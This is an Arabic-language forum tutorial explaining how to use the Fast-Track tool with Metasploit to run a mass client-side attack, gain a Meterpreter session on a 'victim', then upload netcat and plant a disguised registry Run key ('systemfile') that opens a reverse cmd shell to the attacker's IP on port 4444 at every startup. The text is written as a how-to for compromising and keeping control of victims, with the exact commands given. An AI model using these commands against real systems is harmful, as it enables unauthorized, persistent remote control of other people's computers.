بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ..

وشلونكم ؟

ندخل في صلب الموضوع ..

طبعا المكتوب واضح من عنوانه ..

راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side

طيب يا عامر وش يعني ؟

باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..

طيب ندخل على التيرمنال .. بوضعية الجذر

و نكتب الامر لدخول مجلد الفاست تراك

كود:

cd/pentest/exploits/fasttrack


لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..

طيب نشغله بالامر ..

كود:

./fast-track.py -i


-i تعني تشغيل السكربت داخل التيرمنال ..

الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد

هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4

من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )

من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته ..

ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..

الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..

ننتظر الى ان تنتهي .. بكملة Server started

بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل )

عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..

ندخل لها بالامر

كود:

sessions -i 1

1 يعني رقم الجلسة ..

الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل

================================================== =========


دور المفاجئة :-

المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..

اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..

كود:

upload /tmp/nc***** C:\\windows\\system32\\nc*****

الان ندخل على موجه الاوامر تبع الضحية ..

كود:

execute -c -H -f cmd***** -i

وش السواة الحين ؟

امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444

مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..

و هذا هو الامر كامل

كود:

reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/

reg add : واضح .. امر بدائي لاضافة اي مفتاح
hklm : و تعني مجلد HKEY_LOCAL_MACHINE
/v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile
/t : و تعني نوع المفتاح و في الاغلب يكون reg_sz
/d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444

الان و بعد زرع المفتاح ..

نروح للتيرمنال و ونتنصت على البورت 4444 ..

كود:

nc -vlp 4444


و الضحية راح يشبك معك يوميا ..

noureno

للمراسلة على الفيس بوك : [email protected]